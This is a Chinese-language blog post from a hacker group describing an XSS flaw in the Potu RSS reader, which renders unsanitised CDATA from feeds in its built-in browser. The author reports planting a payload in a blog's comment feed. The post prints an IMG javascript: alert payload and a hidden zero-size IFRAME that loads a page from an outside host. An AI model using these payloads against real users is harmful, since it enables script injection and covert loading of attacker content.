potu周博通-资讯阅读器2.0(26060619)最新。漏洞
周博通是目前最流行的免费RSS阅读器之一,界面友好,分类清晰,操作简单.内置新浪网、新华网、天极网、计世网等数百个RSS新闻源,不用打开网页就可第一时间阅读自己喜欢的新闻。
CDATA部件在XML里:
If your text contains a lot of "<" or "&" characters – as program code often does – the XML element can be defined as a CDATA section.
如果文本包含了很多的"<"字符和"&"字符――就象程序代码一样,那么最好把他们都放到CDATA部件中。
everything inside the CDATA section is ignored by the parser.所有在CDATA部件之间的文本都会被解析器忽略。
而potu却自作聪明,把代码转换成了html,然后再从他自带的浏览器中打开。
C:\Program Files\zhoubotong\RssReader\Common\temphtmlb.htm
看起来很方面,却忽略了一些安全因素。
比如这个CDATA,转换的时候,并没有做任何处理。导致了xss漏洞。
现在我在blog里回复了一条xss语句。(刚好师父的blog里面有这个语句大全,所以。。。)
因为本来订阅文章那里是用户订阅的。
http://promise.cnxhacker.com/blog/feed.asp
而文章那里的rss只能是师父可以编辑,我们能编辑只能是回复的rss。
http://promise.cnxhacker.com/blog/feed.asp?q=comment
刚好,这个回复的通常只有blog的主人会去浏览。
<IMG SRC="javascript:alert(‘hacked by kxlzx’);">
如果成功攻击,会出现一个匡。
但是<IFRAME src="http://inbreak.net/kxlzx1.htm" frameBorder=0 width=0 height=0></IFRAME> 这个东西却不行,原因并不是potu的事情,而是该blog本身的防范,把这句自动转换成了
“ <IFRAME src="<a href="http://inbreak.net/kxlzx1.htm" title="http://inbreak.net/kxlzx1.htm" target="_blank">http://inbreak.net/kxlzx1.htm</a>" frameBorder=0 width=0 height=0></IFRAME>”
结果不能执行。
也就是说如果换个地方,也许会。。。
相关动画下载:
http://inbreak.net/blog/uploads/20060722/potuxss.rar
空虚浪子心[XGC]
中国X黑客小组技术部.
http://www.cnxhacker.com
0 条评论。